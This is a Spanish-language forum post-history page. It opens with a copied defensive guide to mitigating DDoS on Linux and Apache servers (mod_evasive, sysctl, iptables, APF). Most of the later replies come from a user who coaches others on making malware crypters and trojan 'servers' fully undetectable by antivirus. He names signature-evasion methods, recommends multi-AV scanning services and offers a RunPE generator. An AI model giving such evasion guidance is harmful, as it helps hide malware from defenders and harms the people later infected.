 DOSSiteCount 50
 DOSPageInterval 1
 DOSSiteInterval 1
</IfModule>


Si queremos bloquear las ips que floodean, podemos usar el iptables:

DOSSystemCommand "sudo -u root -c '/sbin/iptables -A INPUT -s %s -j DROP"

Recordar mirar el syslog por si hay posibles falsos positivos (ip's que no hacian flood).

Para evitar falsos positivos:

Código: php
<IfModule mod_evasive.c>
# añadir estas líneas que corresponden a rangos de los bots de google
DOSWhitelist 66.249.65.*
DOSWhitelist 66.249.66.*
</IfModule>


Importante:

Para que el mod_evasive funcione correctamente deberás modificar el:

CitarMaxRequestsPerChild 0
Para poner un valor alto pero nunca ilimitado (0).

CitarMaxRequestsPerChild 10000
Config ejemplo:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

2 - mod_security

El único problema del mod_security es que necesitamos al menos un argumento para detectar el ataque.

En el ejemplo usamos en http_referer y el User Agent para detectar el DDoS:

Bloqueando un ataque Iframe
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

3- tcplimit, ipdrop, ipblock

Usando firewalls dinámicos.

4- Optimizando y asegurando la red con el sysctl.conf

Código: php
cat /proc/sys/net/ipv4/tcp_syncookies

    # Enable IP spoofing protection, turn on Source Address Verification

    net.ipv4.conf.all.rp_filter = 1

    # Enable TCP SYN Cookie Protection

    net.ipv4.tcp_syncookies = 1

    # Enable ignoring broadcasts request
    
    net.ipv4.icmp_echo_ignore_broadcasts = 1


1). Activate SynCookies protection

Código: php
It works by sending out 'syncookies' when the
    syn backlog queue of a socket overflows.

    => echo 1 >/proc/sys/net/ipv4/tcp_syncookies

    or

    => /sbin/sysctl -w net.ipv4.tcp_syncookies=1


2). Disable source routing

Código: php
    => for f in /proc/sys/net/ipv4/conf/*/accept_source_route; do
    echo 0 > $f
    done

    or

    => /sbin/sysctl -w net.ipv4.conf.all.accept_source_route=0


3). Reverse Path Filtering

    Reject incoming packets if their source address doesn't match
    the network interface that they're arriving on

Código: php
   => for f in /proc/sys/net/ipv4/conf/*/rp_filter; do
    echo 1 > $f
    done

    or

    => /sbin/systcl -w net.ipv4.conf.all.rp_filter=1


4). Log RP filter dropped packets (martians)

Código: php
   => for f in /proc/sys/net/ipv4/conf/*/log_martians; do
    echo 1 > $f
    done

    or

    => /sbin/sysctl -w net.ipv4.conf.all.log_martians=1


5). Maximal number of remembered connection requests

Código: php
=> /sbin/sysctl -w net.ipv4.tcp_max_syn_backlog=256


6). How may times to retry before killing TCP connection

    (default 7 on most systems)

Código: php
 => /sbin/sysctl -w net.ipv4.tcp_orphan_retries=4


7). Number of SYN packets the kernel will send before giving up

Código: php
   => /sbin/sysctl -w net.ipv4.tcp_syn_retries=5


8 ). Disable broadcast icmp reply

Código: php
    => /sbin/sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=1


9). Ignore Bogus icmp packets

Código: php
    => /sbin/sysctl -w net.ipv4.icmp_ignore_bogus_error_responses=1


10). Disable ICMP redirect

Código: php
    => echo 0 >/proc/sys/net/ipv4/conf/all/accept_redirects
    => echo 0 >/proc/sys/net/ipv4/conf/all/send_redirects

    or

    => /sbin/sysctl -w net.ipv4.conf.all.accept_redirects=0
    => /sbin/sysctl -w net.ipv4.conf.all.send_redirects=0


11). Disable timestamps

Código: php
   => echo 0 >/proc/sys/net/ipv4/tcp_timestamps

    or

    => /sbin/sysctl -w net.ipv4.tcp_timestamps=0


12). Reduce DOS ability by reducing timeouts

Código: php
    => echo 30 >/proc/sys/net/ipv4/tcp_fin_timeout
    => echo 1800 >/proc/sys/net/ipv4/tcp_keepalive_time
    => echo 0 >/proc/sys/net/ipv4/tcp_window_scaling
    => echo 0 >/proc/sys/net/ipv4/tcp_sack

    or

    => /sbin/sysctl -w net.ipv4.tcp_fin_timeout=30
    => /sbin/sysctl -w net.ipv4.tcp_keepalive_time=1800
    => /sbin/sysctl -w net.ipv4.tcp_window_scaling=0
    => /sbin/sysctl -w net.ipv4.tcp_sack=0


- Lista de todas las variables del TCP:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Lista de Variables del /proc/sys/net/ipv4/* (con varlores por defecto y explicaciones)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Más ejemplos de configuración completa del sysctl.conf en las referencias del documento.

5- APF Firewall con el módulo anti-ddos

Código: php
wget http://www.rfxnetworks.com/downloads/apf-current.tar.gz
tar xvzf apf-current.tar.gz
cd apf-0.9.6-1/
./install.sh

Citar
service apf start
/usr/local/sbin/apf -s

Fichero de configuración:

Citar/etc/apf/conf.apf
Despues de hacer las pruebas dejar:
DEVEL_MODE="0"

Si nos sale un error parecido a este:

Citarapf(9413): unable to load iptables module (ip_tables), aborting.

Cambiamos esto:

CitarSET_MONOKERN="1"

Puertos que queremos abrir (inbound)
IG_TCP_CPORTS="21,22,25,53,80,110"

Si queres bloquear todo el tráfico de salida lo ponemos en 1 (outbound)
EGF="0"

Si queremos usar el módulo antddos poner a 1:
USE_AD="0"

Log:
/var/log/apf_log

Para ver los paquetes que dropeamos:
LOG_DROP="1"

Lo guardará en el syslog, ejemplo:

Proto= Protocolo
SRC= ip origen
SPT= Source Port (puerto d origen)
DST= Destination Port (puerto destino)

CitarOct 20 13:59:27 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=18779 PROTO=TCP SPT=11629 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:16 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20376 PROTO=TCP SPT=27734 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:17 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20382 PROTO=TCP SPT=25943 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:17 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20387 PROTO=TCP SPT=19026 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:17 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20397 PROTO=TCP SPT=2155 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:17 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20407 PROTO=TCP SPT=9294 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:22 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20687 PROTO=TCP SPT=9269 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:22 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20694 PROTO=TCP SPT=27223 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:23 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=20830 PROTO=TCP SPT=30938 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:25 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=21038 PROTO=TCP SPT=5377 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:27 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=21219 PROTO=TCP SPT=13341 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:00:42 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=21990 PROTO=TCP SPT=22960 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0
Oct 20 14:02:32 ns2 kernel: ** SANITY ** IN=eth0 OUT=  SRC=213.27.201.254 DST=192.168.0.3 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=26386 PROTO=TCP SPT=2826 DPT=80 WINDOW=0 RES=0x00 RST FIN URGP=0

Recuerda que para usar el antidos debes añadir el cron job:

Citar*/8 * * * * root /etc/apf/ad/antidos -a >> /dev/null 2>&1

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

KISS My Firewall es una alternativa.

Script PHP
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

6- Parar el botnet

ZmbScap - Zombie Scapper - Stoopt DDoS Programs
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Tracking Botnets - Bot-Commands
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Tracking Botnets
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Tracking Botnets - DDoS-attacks
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Phatbot Trojan Analysis
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

F-Bot by f-secure- Elimina el Agobot y todas sus variantes
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Nepenthes - Autoinfecarse sin peligro para analizar
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

honeytrap – trap attacks against tcp services
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

7- Usando reglas del iptables

Código: php
# todo el trafico syn
-P INPUT DROP
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp ! --syn -j REJECT --reject-with tcp-reset
-A INPUT -m state --state INVALID -j DROP
-P OUTPUT DROP
-A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -p tcp ! --syn -j REJECT --reject-with tcp-reset
-A OUTPUT -m state --state INVALID -j DROP
-P FORWARD DROP
-A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
-A FORWARD -p tcp ! --syn -j REJECT --reject-with tcp-reset
-A FORWARD -m state --state INVALID -j DROP
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A FORWARD -i lo -o lo -j ACCEPT


# sube las cargas pero muchos wwww buena señal
-A INPUT -p tcp --syn -j REJECT --reject-with icmp-port-unreachable



# la que mejor va
-N syn-flood
-A syn-flood -m limit --limit 100/second --limit-burst 150 -j RETURN
-A syn-flood -j LOG --log-prefix "SYN flood: "
-A syn-flood -j DROP



# igual que el de arriba pero muy bestia
-N syn-flood
-A INPUT -i eth0:2 -p tcp --syn -j syn-flood
-A syn-flood -m limit --limit 1/s --limit-burst 4 -j RETURN
-A syn-flood -j DROP


-A INPUT -p tcp -m tcp --tcp-flags SYN,RST,ACK SYN -m limit --limit
1/sec -j ACCEPT
-A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK RST -m limit
--limit 1/sec -j ACCEPT

# no es muy efectivo
-A INPUT -s 0/0 -p tcp --syn --source-port 1000:5000
--destination-port 80 -j DROP

# no es muy efectivo
-A INPUT -p tcp -m tcp --dport 80 --sport 1000:5000 --tcp-flags SYN SYN -j DROP

# Descartar paquetes mal formados 

-N PKT_FAKE
-A PKT_FAKE -m state --state INVALID -j DROP
-A PKT_FAKE -p tcp --dport 80 --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
-A PKT_FAKE -p tcp --dport 80 --tcp-flags SYN,FIN SYN,FIN -j DROP
-A PKT_FAKE -p tcp --dport 80 --tcp-flags SYN,RST SYN,RST -j DROP
-A PKT_FAKE -p tcp --dport 80 ! --syn -m state --state NEW -j DROP
-A PKT_FAKE -f -j DROP
-A PKT_FAKE -j RETURN 

# syn-flood
-N syn-flood
-A INPUT -i eth+ -p tcp --tcp-flags SYN,ACK,FIN,RST RST -j syn-flood
-A FORWARD -i eth+ -p tcp --tcp-flags SYN,ACK,FIN,RST RST -j syn-flood
-A syn-flood -m limit --limit 4/s --limit-burst 16 -j RETURN
-A syn-flood -m limit --limit 75/s --limit-burst 100 -j RETURN
-A syn-flood -j LOG --log-prefix "SYN FLOOD " --log-tcp-sequence  --log-tcp-options  --log-ip-options -m limit --limit 1/second
-A syn-flood -j DROP

# By pepel. Requiere módulo "recent"
-A INPUT -p tcp --dport 80 -m state --state NEW -m recent   --set
-A INPUT -p tcp --dport 80 -m state --state NEW -m recent  --update --seconds 10 --hitcount 10 -j DROP

#explicación:
Se añade cada ip que se conecte a la tabla de recent
Por por cada ip en la tabla de recent si hace mas de x hits en x segundos, se dropea.


iptables -I INPUT -p tcp –syn -m recent –set
iptables -I INPUT -p tcp –syn -m recent –update –seconds 10 –hitcount 30 -j DROP

UDP Flood

/sbin/iptables -A OUTPUT -p udp -m state --state NEW -j ACCEPT
/sbin/iptables -A OUTPUT -p udp -m limit --limit 100/s -j ACCEPT
/sbin/iptables -A OUTPUT -p udp -j DROP

Lo que hace es contar el número de paquetes SYN (inicio de conexión TCP) para 
cada dirección IP en los últimos 10 segundos. Si llega a 30 descarta ese paquete por
 lo que no se establecerá la conexión (el TCP volverá a intentar varias veces, 
cuando baje del límite podrá establecerse).


8- Usando el mod_throttle

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Otros:

Mod_Throttle, mod_bandwidth, mod_iplimit, mod_tsunami, mod_limitipconn.c

Para Apache 2:
mod_cband

Código: php
cd /usr/src
wget http://www.snert.com/Software/mod_throttle/mod_throttle312.tgz
tar zxvf mod_throttle312.tgz
cd mod_throttle-3.1.2
pico Makefile
Then edit the line that reads:
APXS=apxs
And change it to read:
APXS=/usr/local/apache/bin/apxs
make
make install
service httpd restart


Citar<IfModule mod_throttle.c>
ThrottlePolicy Volume 10G 30d
</IfModule>
<Location /throttle-me>
SetHandler throttle-me
</Location>
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

C) Referencias

- Opciones de seguridad en Linux a través de /proc (I) y (II)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Syctl.conf Hardening
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Ipsysctl tutorial 1.0.4
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

-  Hardening the TCP/IP stack to SYN attacks
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- DDOS and SYN_Recv Attacks And some SOlutions
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Distributed Reflection Denial of Service
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Dynamic iptables firewalls
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Preventing DDoS Attacks
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Distributed Denial of Service (DDoS) Attacks/tools
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Linux firewall rulesets and snippets of rule sets
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente: Taringa!
#465
Dudas y pedidos generales / Re:¿Cómo Moddear un Crypter desde Source?
Julio 23, 2011, 01:40:08 PM
Uhh lei cualquier cosa, disculpen.
Para indetectar el stub desde el codigo fuente, te recomiendo este video tutorial que esta muy bueno, de el podes sacar muchas ideas a la hora de ofuscar el source.
Video: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Herramenta: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos,, Cronos.-
#466
Tutoriales / Re:Reflejo web 2-0 con macromedia flash
Julio 23, 2011, 01:16:05 PM
Muy bueno, ese efecto te sirve de mucho y queda muy bien en las cosas que haces. Yo lo use para mi avatar xD
PD: Me trajo una idea aver si mas adelante me animo y les ago un video tutorial explicando como hacer iconos web 2.0
Saludos,, Cronos.-
#467
Dudas y pedidos generales / Re:Una Pregunta!!!
Julio 23, 2011, 01:13:44 PM
Mira para eso tienes que llenarte de informacion, de metodos que vienen para la indetectivilidad de los Crypters como metodos, AvFucker, Dir, Dsplit, Rit, Hex, etc. No es muy dificil lo unico que necesitas es tener los avs en tu pc, y usar un Offsets locator. Vas buscando las firmas que te detectan los Avs y las vas modificando con Hex, con tiempo y esfuerzo sale cualquier FUD mi amigo.
Aca una coleccion de metodos: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si tienes alguna duda solo pregunta tela respondere con gusto.
Saludos,, Cronos.-
#468
Dudas y pedidos generales / Re:Ayuda con cURL?
Julio 22, 2011, 12:35:08 PM
Movido a Dudas Generales.
#469
Otros lenguajes Scripting / Re:Código JavaScript para mostrar contraseñas
Julio 20, 2011, 11:50:43 PM
Yo conocia un metodo muy sencillo que era facil de recordar, son pasos muy faciles, si lo recuerdo lo posteo. Pero estos metodos no estan nada mal. Es mas todo lo que sean informacion es mas que vienvenido.
Saludos,, Cronos.-
#470
Dudas y pedidos generales / Re:[duda]videos de yotube en el foro
Julio 18, 2011, 10:11:36 AM
Mira si no me equivoco la etiqueta para colgar los videos de youtube no esta instalada aun.
PD: esto va en dudas generales.
Saludos,, Cronos.-
#471
Dudas y pedidos generales / Re:Ayuda con Scan
Julio 18, 2011, 09:56:45 AM
Gracias stiuver, la verdad que la idea esta buena, el generador de cuentas de myavscan lo que hacia era crearte una cuenta de mail sola y registrarla automaticamente, ahora hacero yo mismo es muy bago xD
Pero me parese que es lo unico que quda.. veremos que podemos hacer.
Saludos,, Cronos.-
#472
Dudas y pedidos generales / Re:Ayuda con Scan
Julio 18, 2011, 12:10:46 AM
Ya lo eh leido a ese post, pero no me ayuda mucho, lo unico que me serviria es scan4you, pero necesito una cuenta premi.. Los demas no me sirven.
Gracias de todos modos.
Saludos,, Cronos.-
#473
Dudas y pedidos generales / [SOLUCIONADO] Ayuda con Scan
Julio 17, 2011, 11:08:21 PM
Buenos dias comunidad de Underc0de, miren les vengo con una duda, resulta que yo modeo crypters y usaba una herramienta hecha por Santiagork que generaba cuantas de Myavscan que te permitian 1 Scan, esta web para los que no la conoces escanea tu server en 34 Avs diferentes, es una exelente web para escaniar tus server. Pero me ah pasado algo terrible, han actualizado la web de Myavscan y esta herramienta no funciona mas. Alguien conoce alguna web con esta cantidad de Avs para escaniar mis server y asi poder seguir haciendo crypters, no creo que allan free, pero si son pagas vere como conseguir la plata y pagarlas asi puedo traer lindos FUD para el foro.
Gracias de ante mano, Saludos,, Cronos.-
#474
Seguridad / Re:[Encuesta] Mejor Antivirus
Julio 08, 2011, 07:46:11 PM
Avira el mejor lejos, No uso antivirus, pero con mi experiencia es el mejor a la hora de protejer tu pc contra amenazas, es el AVs mas complicado de sacar a la hora de crear crypter. Ademas de ser super liviano y rapido, Una segunda eleccion podria ser Nod32.
PD: Avast no es seguro. Su firma se saca en 2 simples pasos y queda totalmente neutralizada la firma.
Saludos,, Cronos.-
#475
Dudas y pedidos generales / Re:Problema con crypter :(
Julio 04, 2011, 09:34:23 AM
Mira, todavia te falta mucho por aprender.
Primero te lo detectan mas troyano ahora que antes ya que lo encryptaste con un crypter quemado o no fud.
Para que tu RumPe sea indetectale tienes que codearlo tu mismo, ahi herramientas que te generan el RumPe y luego con metodos los vas modificando y aplicando AvFuncker, Dsploit y mas metodos sacas las firmas que te quedaron.
No es un trabajo sencillo el codear un crypter si recien te inicias.. Ahora subire esta herramienta de la cual te conte que genera Rumpe al foro asi puedes descargarla. Si tienes mas dudas solo comenta
Saludos,, Cronos.-
#476
Dudas y pedidos generales / Re:Duda indetectar server
Julio 04, 2011, 09:13:47 AM
Mira UNOM, tu duda de los offsets es que creo que no sabes bien que son, para hacerte mas facil el tema usando un crypter fud, te deja indetectable el server y cuando lo ejecutas sigue indetectable, ya que el crypter lo que hace es copiar el stub que contiene este crypter (esta codeado este stub y es indetectable) por el del server que puede ser detectado. Cuando tu te metas mas al tema y hagas tus propios crypter tendras que saber mas del tema, que son los offset, como sacar las firmas, los metodos AvFucker, Dsploit, Rit, Hex y mas.
Ahi info de esos temas en el foro. Tan solo busca y lee.
Saludos,, Cronos.-
#477
Dudas y pedidos generales / Re:Duda indetectar server
Junio 27, 2011, 07:05:11 PM
Yo sinceramente no estoy muy metido en el tema, pero no me queda muy claras tus dudas ya que te enredas mucho al explicar.. Pero mira el crypter lo que hace es sustituir el Stub del archivo por el Stub que contiene el crypter (corriganme si me equivoco porque no estoy muy seguro del tema). Tal vez has encryptado tu server con un crypter viejo ya quemado que no este fud y por eso te lo detecta el AVs, si esa no es tu duda aclara un poco mas y tratare de responder.
Y con tu segunda pregunta pienso que no te dice la cantidad de offsets que detecta porque los AVs estan hecho para las pc de usuarios no avanzados.. Que quiero decir con esto? que es mas facil que salga una alerta diciendo que detecto una amenaza y no un cartel que diga hemos detectado 15 offsets, eso pienso yo
Igual no estoy seguro de lo que te estoy diciendo ya que no toco la seccion malwares hace mas de 1 años :S
Porfavor corriganme en lo que me aya equivocado.
Saludos.. Cronos.-
#478
Cursos, manuales y libros / Re:Hackear Maquina de cocacola
Junio 27, 2011, 10:45:02 AM
En el tutorial no espesifica bien, solo dice que tiene  que las maquinas de coca-cola posiblemente afectadas necesitan tener una pantalla de led y despues testiando con los codigos que nos da nos damos cuenta si esa maquina contiene el "debug menu" o no,
Muy buen tuto, espero que sea posible realizar esto y no sea simplemente "fantasia"
Saludos.. Cronos.-
#479
Hacking / Re:Hackeando solo con la ip
Marzo 20, 2011, 03:01:25 PM
No has leido bien, ANTRAX espesifica que el usuario solo debe tener XP,2000,NT. Por lo que dijo no es compatible con los usuarios de Win7.
#480
Phreak / Re:Trucos celulares Samsung
Agosto 25, 2010, 09:28:48 PM
Si, el problemas es que no todos son compatible, el mio tampoco me andan. Seguro son para modelos mas viejos.
Saludos,, Cronos!
Páginas 1 ... 22 23 24 25 26